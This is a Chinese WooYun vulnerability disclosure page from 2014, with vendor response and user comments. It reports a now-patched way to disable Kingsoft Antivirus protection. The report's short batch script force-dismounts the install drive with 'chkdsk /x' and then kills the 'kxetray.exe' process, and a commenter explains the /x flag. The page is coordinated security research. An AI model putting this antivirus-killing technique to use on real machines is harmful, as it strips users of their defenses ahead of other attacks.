当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078659

漏洞标题:轻松干掉金山毒霸主防(不止金山)!

相关厂商:金山毒霸

漏洞作者: zhuixing

提交时间:2014-10-09 16:28

修复时间:2015-01-07 16:30

公开时间:2015-01-07 16:30

漏洞类型:拒绝服务

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-12-05: 细节向核心白帽子及相关领域专家公开
2014-12-15: 细节向普通白帽子公开
2014-12-25: 细节向实习白帽子公开
2015-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

简单到不可思议!

详细说明:

假设金山毒霸安装路径为D:\jinshan,
测试脚本如下:
@echo off
mode con cols=20 lines=1
chkdsk /x d:
taskkill /F /IM kxetray.exe
不可思议吧!

漏洞证明:

jinshan.gif

修复方案:

你们都是精英……

版权声明:转载请注明来源 zhuixing@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-10-11 10:59

厂商回复:

非常感谢你的反馈,我们已经在修复此问题

最新状态:

2014-11-12:已修复


漏洞评价:

评论

  1. 2014-10-09 16:29 | 校长 ( 实习白帽子 | Rank:40 漏洞数:10 | 本人受《中华人民共和国未成年人保护法》《...)

    前排上央视

  2. 2014-10-09 16:31 | 假马 ( 普通白帽子 | Rank:142 漏洞数:18 | 我存在,你婶婶的脑海里.)

    看这里看这里!看这里看这里!

  3. 2014-10-09 16:36 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    坐等瑞星、卡巴、NOD32、诺顿....

  4. 2014-10-09 16:49 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    通用漏洞吗?

  5. 2014-10-09 16:51 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    三连发啊!

  6. 2014-10-09 16:57 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    录像的师傅快看这里!

  7. 2014-10-09 18:29 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    关注中

  8. 2014-10-09 18:39 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

    @袋鼠妈妈 漠漠也同样坐等 不知道和360的那个有什么关系

  9. 2014-10-09 21:56 | zhuixing ( 实习白帽子 | Rank:50 漏洞数:9 | 纯纯的小白。)

    @大漠長河 同理的关系

  10. 2014-10-10 08:40 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    火钳刘明 我要上CCTV

  11. 2014-10-10 09:03 | sysALong ( 路人 | Rank:19 漏洞数:5 | 电脑里的AV片 永远 和 电脑旁的卫生纸 成 ...)

    这个牛了。

  12. 2014-10-11 11:26 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    看不明白 很吊的样子

  13. 2014-10-14 12:02 | 鸡鸡 ( 路人 | Rank:7 漏洞数:4 )

    是不是用360安全卫士干掉了?

  14. 2014-10-15 17:10 | 破锁 ( 路人 | Rank:23 漏洞数:6 )

    6666666666666特么想把6打的老长老长了。。。。。。。。。。。。。。。。。

  15. 2014-11-20 11:59 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    没有明白原理呀,chkdsk干了什么?

  16. 2014-11-20 15:32 | cat73 ( 实习白帽子 | Rank:34 漏洞数:6 | 喵爱吃鱼, 喵要吃好多好多鱼~~地址栏输入...)

    @latershow 注意参数/x强行关闭已经打开的句柄

  17. 2014-11-27 18:07 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    思路果然猥琐

  18. 2015-01-08 19:26 | Code_Monkey ( 路人 | Rank:24 漏洞数:7 | Code Monkey think someday he have everyt...)

    chkdsk /x